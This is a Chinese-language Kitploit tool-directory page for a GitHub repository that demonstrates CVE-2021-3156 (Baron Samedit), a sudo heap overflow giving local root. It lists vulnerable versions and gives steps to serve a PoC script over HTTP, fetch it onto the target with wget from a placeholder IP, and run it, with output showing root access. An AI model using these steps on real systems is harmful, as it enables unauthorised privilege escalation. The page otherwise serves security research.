Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
工具/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
权限提升漏洞分析漏洞利用渗透测试红队二进制利用
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
431年前尚未审核

👑 CVE-2021-3156(Baron Samedit)— 通过 sudo 的堆溢出进行权限提升

📅 日期: 2025-06-08
✍️ 作者: @TopskiyPavelQwertyGang
🧠 安全研究员 | Red Team 爱好者


🧠 CVE 概述

  • CVE 编号: CVE-2021-3156
  • 类型: 基于堆的缓冲区溢出(Heap-based Buffer Overflow)
  • 组件: sudoedit(sudo)
  • 访问级别: 本地
  • 目标: 获取 root 权限

🧠 描述

sudoedit 中的堆溢出漏洞允许本地用户在运行带有精心准备参数的 sudoedit 命令时获取 root 访问权限。

该漏洞对 sudo 版本 < 1.9.5p2(包括常见的 Ubuntu/Debian/CentOS 镜像)有效。
即使启用了 ASLR,该漏洞仍然可利用。


🐾 利用条件

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31(tcache 已启用)
sudo   : 1.8.31(存在漏洞)
ASLR   : 2(已启用)

🧪 环境准备

  1. 检查 glibc 和 sudo 的版本:
root@kitploit:~
ldd --version
sudo --version
  1. 通过内置 HTTP 服务器从另一台机器传输 PoC 脚本:
root@kitploit:~
python3 -m http.server 80
  1. 在目标机器上下载并执行 PoC:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 PoC 成功利用

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 结论

如果 glibc ≥ 2.26 且 sudo 为易受攻击版本,即使 ASLR 处于活动状态,CVE-2021-3156 的利用仍然可能。
在正确配置 NSS 的情况下,exploit_nss.py 是最稳定的漏洞利用脚本,首次即可成功触发。

🧨 系统已被控制。

下载工具